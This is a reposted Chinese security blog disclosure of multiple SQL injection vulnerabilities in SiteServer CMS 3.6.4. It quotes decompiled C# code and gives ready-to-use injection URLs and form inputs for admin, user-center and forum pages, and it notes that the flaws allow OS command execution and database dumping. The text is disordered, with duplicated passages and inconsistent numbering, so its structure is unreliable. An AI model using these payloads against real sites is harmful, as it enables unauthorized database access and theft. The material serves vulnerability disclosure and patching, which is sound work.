siteserver最新版3.6.4 sql inject

暗月博客 2019年11月21日19:14:14评论622 views字数 3570阅读11分54秒阅读模式
摘要

查看代码如下: this.spContents.ConnectionString = BaiRongDataProvider.ConnectionString; flag = base.Request.QueryString["UserName"] != null; if (!flag) { this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend(); } else { this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend(base.Request.QueryString["UserName"], base.Request.QueryString["Keyword"], base.Request.QueryString["DateFrom"], base.Request.QueryString["DateTo"]); } 所有的参数都没有进行有效的过滤
漏洞 证明:
http://www.target.com/siteserver/platform/background_log.aspx?UserName=test&Keyword=1&DateFrom=20120101'%20and%20@@version=1%20and%201='test&DateTo=test

3.第三个注入存在usercenter/platform/user.aspx
用.NET Reflector 反编译UserCenter.Pages.dll这个文件
查看代码如下:

1. http://WWW.MOONSEC.COM/siteserver/service/background_taskLog.aspx?Keyword=test%' and @@version=1 and 2='1&DateFrom=&DateTo=&IsSuccess=All

注入点存在于Keyword中,完全没有任何过滤。各种SQL注入类型,可以执行os cmd,脱裤

2.第二个注入存在siteserver/platform/background_log.aspx

用.NET Reflector 反编译BaiRong.BackgroundPages.dll这个文件

查看代码如下:

this.spContents.ConnectionString = BaiRongDataProvider.ConnectionString;     flag = base.Request.QueryString["UserName"] != null;     if (!flag)     {         this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend();     }     else     {         this.spContents.SelectCommand = BaiRongDataProvider.LogDAO.GetSelectCommend(base.Request.QueryString["UserName"], base.Request.QueryString["Keyword"], base.Request.QueryString["DateFrom"], base.Request.QueryString["DateTo"]);     } 

所有的参数都没有进行有效的过滤
漏洞证明:
http://www.target.com/siteserver/platform/background_log.aspx?UserName=test&Keyword=1&DateFrom=20120101'%20and%20@@version=1%20and%201='test&DateTo=test

3.第三个注入存在usercenter/platform/user.aspx
用.NET Reflector 反编译UserCenter.Pages.dll这个文件
查看代码如下:

if (!string.IsNullOrEmpty(base.Request.QueryString["Lock"]))     {         str = base.Request.QueryString["UserNameCollection"];         userNameArrayList = TranslateUtils.StringCollectionToArrayList(str);         UserDataProvider.UserDAO.Lock(userNameArrayList, true);         LogUtils.AddLog("用户:" + UserDataProvider.UserDAO.CurrentUserName, "锁定用户", string.Format("用户:{0}", str));

Lock不为空即可,UserNameCollection就带入了UserDataProvider.UserDAO.Lock函数内

public void Lock(ArrayList userNameArrayList, bool isLockOut) {     string commandText = string.Format("UPDATE bairong_Users SET IsLockedOut = '{0}' WHERE [UserName] IN ({1})", isLockOut.ToString(), TranslateUtils.ObjectCollectionToSqlInStringWithQuote(userNameArrayList));     base.ExecuteNonQuery(commandText);     UserManager.Clear(); }

UserNameCollection没有进行有效的过滤

http://www.target.com/usercenter/platform/user.aspx?UnLock=sdfe'&UserNameCollection=test')%20and%20@@version=2;%20--

3.第七个注入存在/UserCenter/cms/contents.aspx
用.NET Reflector 反编译UserCenter.Pages.dll这个文件
查看代码如下:

int totalCount;     bool flag;     string keyword = this.Keyword.Text.Trim();     if ((((uint) totalCount) - ((uint) flag)) <= uint.MaxValue)     {         string start = this.start.Value;         if (0 != 0)         {             return;         }         string end = this.end.Value;         if ((((uint) flag) - ((uint) flag)) <= uint.MaxValue)         {             base.SetPublishmentSystemID(TranslateUtils.ToInt(this.ddlPublishmentSystemID.SelectedValue));             this.spContents.ControlToPaginate = this.dlContents;             this.dlContents.ItemDataBound += new RepeaterItemEventHandler(this.x140df91522580d1f);             this.spContents.ItemsPerPage = 30;             this.spContents.ConnectionString = BaiRongDataProvider.ConnectionString;             this.spContents.SelectCommand = DataProvider.ContentDAO.GetSelectCommendOfTouGao(base.PublishmentSystemInfo.AuxiliaryTableForContent, base.PublishmentSystemID, start, end, keyword, base.UserName, this.touGaoType);         }         this.spContents.SortField = "ID"; 关注keyword   
public string GetSelectCommendOfTouGao(string tableName, int publishmentSystemID, string start, string end, string keyword, string userName, ETouGaoType touGaoType)   {   ....  

 builder.AppendFormat("AND (Title LIKE '%{0}%' OR Content LIKE '%{0}%')", keyword);
很明显的注入
漏洞证明:
因为这次是post类型,server会对viewstate进行check,所以需要注册一个会员,登录后访问

http://www.target.com/UserCenter/cms/contents.aspx?PublishmentSystemID=1

在关键字处填写
' and @@version=1 and 1='

4.http://www.target.com/siteserver/bbs/background_thread.aspx?UserName=test&Title='%20and%201=@@version%20and%201='&DateFrom=&DateTo=&ForumID=0

http://www.target.com/siteserver/bbs/background_post.aspx?UserName=&Title='%20and%20%201=@@version%20and%201='1&DateFrom=&DateTo=&ForumID=0

http://www.target.com/siteserver/bbs/background_user.aspx?UserGroup=7&PageNum=0&Keyword='%20and%201=@@version%20and%201='&CreationDate=0&LastActivityDate=0

来源:http://0day5.com/archives/1011

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
暗月博客
  • 本文由 发表于 2019年11月21日19:14:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   siteserver最新版3.6.4 sql injecthttp://cn-sec.com/archives/71637.html

发表评论

匿名网友 填写信息